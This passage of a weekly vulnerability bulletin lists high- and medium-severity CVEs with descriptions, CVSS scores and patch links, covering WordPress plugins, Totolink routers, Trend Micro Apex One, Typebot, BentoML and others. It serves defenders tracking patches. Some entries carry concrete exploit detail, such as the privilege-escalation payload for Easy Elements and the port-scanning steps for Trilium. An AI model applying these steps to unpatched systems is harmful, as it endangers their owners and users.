| themewant–Easy Elements for Elementor Addons & Website Templates | The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.5 via the `easyel_handle_register()` function. This is due to the `wp_ajax_nopriv_eel_register` AJAX handler iterating the attacker-controlled `custom_meta` POST array and writing every supplied key-value pair to the newly created user’s meta via `update_user_meta()` without any key whitelist or blocklist, allowing the `wp_capabilities` user meta key to be overwritten after `wp_insert_user()` has already assigned a safe role. This makes it possible for unauthenticated attackers to register a new account with full administrator-level privileges by supplying `custom_meta[wp_capabilities][administrator]=1`. Exploitation requires that user registration is enabled on the site and that at least one page exposes the Login/Register widget, which publishes the required `easy_elements_nonce` into the page DOM where it can be retrieved by any unauthenticated visitor via a simple GET request. | 2026-05-22 | 8.8 | CVE-2026-9018 |
| TONNET–TPR7308 | E-LAN Hybrid Recording System developed by TONNET has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-05-20 | 7.5 | CVE-2026-9003 |
| Totolink–A8000RU | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument ip results in os command injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2026-05-24 | 9.8 | CVE-2026-9384 |
| Totolink–A8000RU | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. This manipulation of the argument command causes os command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-24 | 9.8 | CVE-2026-9385 |
| Totolink–A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Impacted is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument lang leads to os command injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2026-05-24 | 9.8 | CVE-2026-9386 |
| Totolink–A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setUpgradeFW of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument resetFlags results in os command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9387 |
| Totolink–A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setScheduleCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument mode can lead to os command injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9388 |
| Totolink–A8000RU | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setDdnsCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Such manipulation of the argument provider leads to os command injection. The attack may be launched remotely. The exploit is publicly available and might be used. | 2026-05-24 | 9.8 | CVE-2026-9404 |
| Totolink–A8000RU | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setGameSpeedCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument enable results in os command injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9405 |
| Totolink–A8000RU | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function setRemoteCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument enable can lead to os command injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-24 | 9.8 | CVE-2026-9406 |
| Totolink–A8000RU | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b20200521. Affected by this vulnerability is the function setFirewallType of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. The manipulation of the argument firewallType leads to os command injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. | 2026-05-24 | 9.8 | CVE-2026-9407 |
| Trend Micro, Inc.–TrendAI Apex One | A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console�s IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. | 2026-05-21 | 9.8 | CVE-2025-71210 |
| Trend Micro, Inc.–TrendAI Apex One | A vulnerability in the Trend Micro Apex One management console could allow a remote attacker to upload malicious code and execute commands on affected installations. This vulnerability is similar in scope to CVE-2025-71210 but affects a different executable. Please note: although this vulnerability carries a technical critical CVSS rating, this was reported via responsible disclosure via a researcher through the Zero Day Initiative. The SaaS versions of the product have already been mitigated and no customer action required. For this particular vulnerability, an attacker must have access to the Trend Micro Apex One Management Console, so customers that have their console�s IP address exposed externally should consider mitigating factors such as source restrictions if not already applied. | 2026-05-21 | 9.8 | CVE-2025-71211 |
| Trend Micro, Inc.–TrendAI Apex One | A link following vulnerability in the Trend Micro Apex One scan engine could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2025-71212 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation error vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2025-71213 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34927 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different named pipe communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34928 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different inter-process communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34929 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different process protection mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-34930 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45207 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45206 |
| Trend Micro, Inc.–TrendAI Apex One | An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-45206 but exists in a different process protection communication mechanism. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45207 |
| Trend Micro, Inc.–TrendAI Apex One | A time-of-check time-of-use vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2026-05-21 | 7.8 | CVE-2026-45208 |
| TriliumNext–Trilium | Trilium Notes is a cross-platform, hierarchical note taking application focused on building large personal knowledge bases. In versions 0.102.1 and prior, the Clipper API in Trilium Desktop (v0.101.3) allows full authentication bypass when running in an Electron environment. When Trilium detects an Electron environment, it explicitly disables authentication middleware for the Clipper API, exposing endpoints such as /api/clipper/notes to the network with no password, API token, or CSRF protection. An attacker on a shared network (for example, a corporate LAN or public Wi-Fi) can scan for open high-range ports using a tool like nmap, since Trilium often binds to ports such as 37840. Once a candidate port is found, an unauthenticated request to the Clipper handshake endpoint, which also bypasses authentication, confirms a Trilium instance by returning the application name and protocol version. This facilitates unauthorized data access, phishing, and local system compromise. The issue has been fixed in version 0.102.2. | 2026-05-20 | 8.6 | CVE-2026-39310 |
| twigphp–Twig | Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability when using a SourcePolicyInterface that allows attackers with template rendering capabilities to pass arbitrary PHP callables to sort, filter, map, and reduce filters. Attackers can exploit the runtime check that fails to use the current template source to bypass sandbox restrictions and execute arbitrary code when the sandbox is enabled through a source policy rather than globally. | 2026-05-20 | 8.8 | CVE-2026-24425 |
| Tyler Technologies–TID-L | Tyler Identity Local (TID-L) uses documented, default administrative credentials. Users are not required to change the credentials before deployment. TID-L has not been distributed since December 2020, and has not been supported since 2021. | 2026-05-19 | 9.8 | CVE-2026-44159 |
| Ubiquiti Inc–UniFi OS Server | A malicious actor with access to the network could exploit an Improper Access Control vulnerability found in UniFi OS devices to make unauthorized changes to the system. | 2026-05-22 | 10 | CVE-2026-34908 |
| Ubiquiti Inc–UniFi OS Server | A malicious actor with access to the network could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to access an underlying account. | 2026-05-22 | 10 | CVE-2026-34909 |
| Ubiquiti Inc–UniFi OS Server | A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. | 2026-05-22 | 10 | CVE-2026-34910 |
| Ubiquiti Inc–UniFi OS Server | A malicious actor with access to the network and high privileges could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection. | 2026-05-22 | 9.1 | CVE-2026-33000 |
| Ubiquiti Inc–UniFi OS Server | A malicious actor with access to the network and low privileges could exploit a Path Traversal vulnerability found in UniFi OS devices to access files on the underlying system that could be manipulated to obtain sensitive information. | 2026-05-22 | 7.7 | CVE-2026-34911 |
| ultimate-form-builder-lite–Ultimate Form Builder Lite | WordPress Ultimate Form Builder Lite plugin version 1.3.7 and below contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the entry_id POST parameter. Attackers can send POST requests to the admin-ajax.php endpoint with the ufbl_get_entry_detail_action action to extract, modify, or escalate privileges within the WordPress database. | 2026-05-23 | 7.1 | CVE-2018-25352 |
| UserSpice–userSpice | userSpice 4.3.24 contains a username enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by sending POST requests to the existingUsernameCheck.php endpoint. Attackers can submit usernames and analyze response text for the ‘taken’ string to identify existing accounts in the system. | 2026-05-23 | 9.8 | CVE-2018-25350 |
| web-dorado–Contact Form Maker | WordPress Contact Form Maker Plugin 1.12.20 contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries through the FormMakerSQLMapping and generete_csv_fmc AJAX actions. Attackers can inject malicious SQL code via the ‘name’ and ‘search_labels’ parameters to extract sensitive database information or escalate privileges. | 2026-05-23 | 7.1 | CVE-2018-25347 |
| webdriverio–webdriverio | WebdriverIO is a test automation framework for unit, e2e and component testing using WebDriver, WebDriver BiDi and Appium. Versions below 9.24.0 contain a command injection vulnerability leading to remote code execution (RCE) in test orchestration. Git permits branch names containing shell metacharacters, and getGitMetadataForAISelection() interpolates these names directly into execSync() calls without sanitization. An attacker can exploit this by supplying a malicious repository (via testOrchestrationOptions.runSmartSelection.source, or the current directory if unset) whose branch name carries a payload, causing the shell to execute arbitrary code. This enables remote code execution on CI/CD servers and developer machines, leading to credential and secret disclosure, source code and SSH key exfiltration, system compromise, and supply chain attacks via tampered build artifacts. The issue has been fixed in version 9.24.0. | 2026-05-18 | 9.8 | CVE-2026-25244 |
| weDevs–WP ERP Pro | The WP ERP Pro plugin for WordPress is vulnerable to SQL Injection via the ‘search_key’ parameter in all versions up to, and including, 1.5.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-22 | 7.5 | CVE-2026-4834 |
| windmill-labs–windmill | Windmill prior to 1.703.2 contains an incorrect default permissions vulnerability in nsjail sandbox configuration files where /etc is bind-mounted without read-write restrictions, allowing authenticated users to write arbitrary entries to /etc/hosts, /etc/resolv.conf, and /etc/ssl/certs/ca-certificates.crt from within script execution sandboxes. Attackers can exploit persistent poisoned entries across all subsequent script executions on the same worker pod to redirect hostnames, intercept DNS queries, perform transparent HTTPS man-in-the-middle attacks, and intercept WM_TOKEN JWTs to gain workspace-admin access to other users’ workspaces. | 2026-05-19 | 8.1 | CVE-2026-47107 |
| Wishlist Member–Wishlist Member | The WishList Member plugin for WordPress is vulnerable to Privilege Escalation via Missing Authorization in versions up to and including 3.30.1. This is due to the missing capability and nonce check in the ajax_get_screen() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to supply an arbitrary admin screen identifier via the data[url] parameter, causing the plugin to load and execute the administrative API configuration template without authorization. The rendered HTML, which contains the plugin’s plaintext REST API Secret Key, is returned directly to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6419 |
| Wishlist Member–Wishlist Member | The WishList Member plugin for WordPress is vulnerable to Missing Authorization leading to Sensitive Information Disclosure and Privilege Escalation in versions up to and including 3.30.1. This is due to the missing capability checks in the ‘export_settings’ function. This function returns the REST API Secret Key to the attacker in the AJAX JSON response. An attacker who obtains this key can authenticate to the WishList Member API, create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6895 |
| Wishlist Member–Wishlist Member | The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘WishListMemberFeaturesTeam_Accounts::save_settings’ function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options, includes the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6897 |
| Wishlist Member–Wishlist Member | The Wishlist Member plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘WishListMember3_Hooks::generate_api_key’ function in all versions up to, and including, 3.30.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the REST API Secret Key, which can be used to create a new membership level assigned the administrator WordPress role, and register an arbitrary administrator-level user account, resulting in complete site takeover. | 2026-05-23 | 8.8 | CVE-2026-6898 |
| woocommerce–WooCommerce PayPal Payments | The WooCommerce PayPal Payments plugin for WordPress is vulnerable to unauthorized order manipulation and information disclosure due to missing authorization checks on the `ppc-create-order` and `ppc-get-order` WC-AJAX endpoints in all versions up to, and including, 4.0.1. The `ppc-create-order` endpoint accepts an arbitrary WooCommerce order ID in the `pay-now` context without validating order ownership, allowing attackers to create PayPal orders for any WC order and write PayPal metadata to it. The `ppc-get-order` endpoint returns full PayPal order details for any PayPal order ID without binding to the requester’s session. This makes it possible for unauthenticated attackers to chain these endpoints to manipulate other customers’ order payment flows and exfiltrate sensitive order details (payer information, shipping data) by creating a PayPal order for a victim’s WC order and then retrieving the PayPal order data. | 2026-05-23 | 8.2 | CVE-2026-9284 |
| Wp Directory Kit–WP Directory Kit | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.0. | 2026-05-21 | 9.3 | CVE-2026-39531 |
| WP Swings–Gift Cards For WooCommerce Pro | Unrestricted Upload of File with Dangerous Type vulnerability in WP Swings Gift Cards For WooCommerce Pro allows Using Malicious Files. This issue affects Gift Cards For WooCommerce Pro: from n/a through 4.2.6. | 2026-05-20 | 10 | CVE-2026-45444 |
| yiisoft–yii2 | Yii 2 is a PHP application framework. Versions 2.0.54 and prior contain flawed logic in the core view rendering method View::renderPhpFile() that leads to Local File Inclusion. The function calls extract($_params_, EXTR_OVERWRITE) before the require statement that loads the view file. As a result, a caller-controlled _file_ key in the $params array overwrites the internal local variable specifying which file to include, potentially enabling RCE if an attacker can write PHP files through a separate primitive, as well as information disclosure. This issue has been fixed in version 2.0.55. | 2026-05-20 | 7.4 | CVE-2026-39850 |
| YITH–YITH WooCommerce Product Add-Ons | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in YITH YITH WooCommerce Product Add-Ons allows Blind SQL Injection. This issue affects YITH WooCommerce Product Add-Ons: from n/a through 4.29.0. | 2026-05-20 | 7.6 | CVE-2026-42383 |
| ZKTeco–SSC335-GC2063-Face-0b77 Solution Camera | An undocumented configuration export port is accessible on some models of ZKTeco CCTV cameras. This port does not require authentication and exposes critical information about the camera such as open services and camera account credentials. | 2026-05-20 | 9.1 | CVE-2026-8598 |
| Zohocorp–ManageEngine ADSelfService Plus | Zohocorp ManageEngine ADSelfService Plus version before 6525, DataSecurity Plus before 6264 and RecoveryManager Plus before 6313 are vulnerable to Authenticated Remote code execution in the agent machines due to the bug in the 3rd party dependency. | 2026-05-21 | 8.4 | CVE-2026-2740 |
Medium Vulnerabilities
| Primary Vendor — Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 546669204–vps-inventory-monitoring | A vulnerability was determined in 546669204 vps-inventory-monitoring up to 98c00b370668c96ae75e91c15548d9ea113652d9. This issue affects the function eval of the file app/index/command/VpsTest.php of the component VpsTest Console. Executing a manipulation of the argument vf can lead to code injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-23 | 6.3 | CVE-2026-9302 | VDB-365249 | 546669204 vps-inventory-monitoring VpsTest Console VpsTest.php eval code injection VDB-365249 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811843 | 546669204 vps-inventory-monitoring <=98c00b3 Code Injection / Eval Injection https://github.com/546669204/vps-inventory-monitoring/issues/36 https://github.com/dntyfate/cve/issues/2 https://github.com/546669204/vps-inventory-monitoring/ |
| ADD-ONS.ORG–PDF for Elementor Forms + Drag And Drop Template Builder | Missing Authorization vulnerability in ADD-ONS.ORG PDF for Elementor Forms + Drag And Drop Template Builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through 5.5.1. | 2026-05-20 | 5 | CVE-2026-45443 | https://patchstack.com/database/wordpress/plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-5-5-1-broken-access-control-vulnerability?_s_id=cve |
| askywhale–Games Catalog | The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the gc_crud() function which handles the delete action (action=delete) via a GET request without any wp_verify_nonce() / check_admin_referer() call. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the associated WordPress post created for the game) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8418 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0888cda8-63ca-44f6-a3eb-765c14a7e6c7?source=cve https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L94 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L94 https://plugins.trac.wordpress.org/browser/game-catalog/trunk/admin-crud.php#L31 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/admin-crud.php#L31 https://plugins.trac.wordpress.org/browser/game-catalog/trunk/games-catalog.php#L96 https://plugins.trac.wordpress.org/browser/game-catalog/tags/1.2.0/games-catalog.php#L96 |
| baptisteArno–typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the getResultLogs API endpoint authorizes the caller against the provided typebotId but fetches logs solely by resultId without verifying that the result belongs to the authorized typebot, leading to IDOR. An authenticated attacker can supply their own typebotId alongside any victim’s resultId to read execution logs from other workspaces, leaking sensitive data including HTTP response bodies, AI model outputs, and webhook payloads. Every other result-scoped endpoint in the same router properly validates that the resultId belongs to the authorized typebotId. This confirms the missing check is an oversight, not a design choice. This issue has been fixed in version 3.15.2. | 2026-05-22 | 6.5 | CVE-2026-28444 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-c63p-mqx5-75r7 https://github.com/baptisteArno/typebot.io/commit/d82b2d47c86ae614a08d4073c669ca64442faff2 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2, the getLinkedTypebots API endpoint returns full bot definitions to any authenticated user who references a target bot ID in a Typebot Link block, regardless of workspace ownership, leading to IDOR. The authorization check uses Array.filter() with an async callback – since filter() is synchronous, the callback always returns a truthy Promise, so the access control predicate is never actually evaluated. Any authenticated Typebot user can read the full definition of any other workspace’s private bots, including: all conversation blocks and logic flow, variable values embedded in the bot (credentials, API keys, PII), webhook URLs and integration configurations. This issue has been fixed in version 3.16.0. | 2026-05-22 | 6.5 | CVE-2026-39966 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-3fr5-999r-84qj https://github.com/baptisteArno/typebot.io/commit/b9530a089b43bfa6e79e3ff9cbfab921ce832f45 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. In versions 3.16.0 and prior, the WhatsApp Cloud API webhook endpoint (POST /v1/workspaces/{workspaceId}/whatsapp/{credentialsId}/webhook) does not verify the x-hub-signature-256 HMAC signature included by Meta in every webhook delivery. The webhook URL exposes both workspaceId and credentialsId as path parameters, which are logged in web server access logs, visible in Meta’s webhook configuration dashboard, and potentially shared when configuring integrations. This allows any unauthenticated attacker to send spoofed webhook messages to trigger bot flows, consume API resources, and interact with external services using the workspace owner’s credentials. The issue has been fixed in version 3.17.0. | 2026-05-22 | 6.5 | CVE-2026-39969 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-8vqp-r5w7-v47f https://github.com/baptisteArno/typebot.io/releases/tag/v3.17.0 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. In versions prior to 3.16.0, the Typebot viewer (packages/embeds/js) renders anchor tags from rich text bubble content without filtering the javascript: URI scheme. A bot author can set a link URL to javascript:PAYLOAD, which executes in the visitor’s browser context when clicked. Since the viewer is typically embedded in a third-party site, the attacker’s JavaScript runs in the host page’s origin and can exfiltrate cookies and session tokens. This can result in any authenticated Typebot user (including those on the free tier) being able to create a bot with this payload. Shared bots are publicly accessible – no victim authentication is required. This issue has been resolved in version 3.16.0. | 2026-05-22 | 5.4 | CVE-2026-39964 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-hqmv-v56g-4m47 https://github.com/baptisteArno/typebot.io/commit/2c3fc7267a5e1529ba4b1a2ab4f1edb3e3b8990b https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Behance–Smartshop | Smartshop 1 contains a cross-site request forgery vulnerability that allows attackers to modify user profiles by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting editprofile.php with hidden fields for email and password parameters that execute automatically when visited by an authenticated admin user. | 2026-05-23 | 4.3 | CVE-2018-25343 | ExploitDB-44824 Official Product Homepage Product Reference VulnCheck Advisory: Smartshop 1 Cross-Site Request Forgery via editprofile.php |
| bentoml–BentoML | BentoML is a Python library for building online serving systems optimized for AI apps and model inference. In versions 1.4.38 and prior, the build packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as loot.txt -> /tmp/outside-marker.txt or a link to a more sensitive local file. When bentoml build runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows. An attacker can exfiltrate local files from the build host into the Bento artifact, exposing secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configurations. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine. This issue has been fixed in version 1.4.39. | 2026-05-22 | 5.5 | CVE-2026-40610 | https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv https://github.com/bentoml/BentoML/commit/5fb7cd41f92e2a56b45391284cf15b9ac9963a1f https://github.com/bentoml/BentoML/releases/tag/v1.4.39 |
| bestpractical–rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions prior to 5.0.10 and 6.0.0 through 6.0.2 contain a spreadsheet (CSV/formula) injection vulnerability. User-controlled data in spreadsheet exports is not sanitized before being written to the output file, which can cause spreadsheet applications to interpret crafted values as formulas or macros when the file is opened. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by avoiding opening exported RT spreadsheet files directly in spreadsheet applications when the data may contain untrusted user input. | 2026-05-22 | 4.6 | CVE-2026-41073 | https://github.com/bestpractical/rt/security/advisories/GHSA-6×92-7v65-7m3r https://github.com/bestpractical/rt/releases/tag/rt-5.0.10 https://github.com/bestpractical/rt/releases/tag/rt-6.0.3 |
| bigbluebutton–bigbluebutton | BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.19, the recording playback (presentation format) was not sanitizing user’s input in public chat. This allowed for a malicious actor to craft and carry out a targeted XSS attack, activated on anyone replaying the recording. This issue has been fixed 3.0.19. | 2026-05-18 | 6.5 | CVE-2026-27737 | https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-8vv7-vj94-q2pv https://github.com/bigbluebutton/bbb-playback/commit/09e89bfe4ff8488b68c3ff040d3081e419dc89b1 https://github.com/bigbluebutton/bigbluebutton/commit/69f45aa1b963dc7d80179d0155acc670aec5c4fc https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.19 https://github.com/blindsidenetworks/scalelite/releases/tag/v1.7.0 |
| Brainstorm Force–Presto Player | Missing Authorization vulnerability in Brainstorm Force Presto Player allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Presto Player: from n/a through 4.1.3. | 2026-05-19 | 4.3 | CVE-2026-45442 | https://patchstack.com/database/wordpress/plugin/presto-player/vulnerability/wordpress-presto-player-plugin-4-1-3-broken-access-control-vulnerability?_s_id=cve |
| broadstreetads–Broadstreet | The Broadstreet plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.52.2 via the get_sponsored_meta AJAX action due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disclose any private post metadata. | 2026-05-21 | 4.3 | CVE-2026-1881 | https://www.wordfence.com/threat-intel/vulnerabilities/id/328ccf8f-797b-4b1a-b0f1-afd8e44f41e6?source=cve https://plugins.trac.wordpress.org/changeset?old_path=%2Fbroadstreet/tags/1.52.2&new_path=%2Fbroadstreet/tags/1.53.2 |
| burlingtonbytes–WP Blockade Visual Page Builder | The WP Blockade plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘shortcode’ parameter in all versions up to and including 0.9.14. This is due to insufficient input sanitization and output escaping in the render_shortcode_preview() function. The function receives user input from $_GET[‘shortcode’], passes it through stripslashes() without any sanitization, and then outputs it directly via echo do_shortcode($shortcode) on line 393. When the input is not a valid WordPress shortcode (e.g., an HTML tag with JavaScript event handlers), do_shortcode() returns it unchanged, and it is reflected into the page without escaping. The endpoint is registered via admin_post_ (not admin_post_nopriv_), meaning it requires the user to be logged in with at minimum a Subscriber-level account. There is no nonce verification or additional capability check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute if they can successfully trick a user into performing an action such as clicking a link. | 2026-05-22 | 6.1 | CVE-2026-3481 | https://www.wordfence.com/threat-intel/vulnerabilities/id/66950509-ce2a-42fe-a8b2-2a92a1b573c3?source=cve https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393 https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L360 https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L360 |
| calcom–cal.diy | A security flaw has been discovered in calcom cal.diy up to 4.9.4. The affected element is the function validateUrlForSSRF of the file apps/web/app/api/logo/route.ts of the component Logo API. The manipulation results in server-side request forgery. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is described as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 5 | CVE-2026-9304 | VDB-365251 | calcom cal.diy Logo API route.ts validateUrlForSSRF server-side request forgery VDB-365251 | CTI Indicators (IOB, IOC, IOA) Submit #812176 | cal.com <= v4.9.4 Server-Side Request Forgery (CWE-918) https://gist.github.com/YLChen-007/b3d0b85767b7e346a291933d602fbb3b |
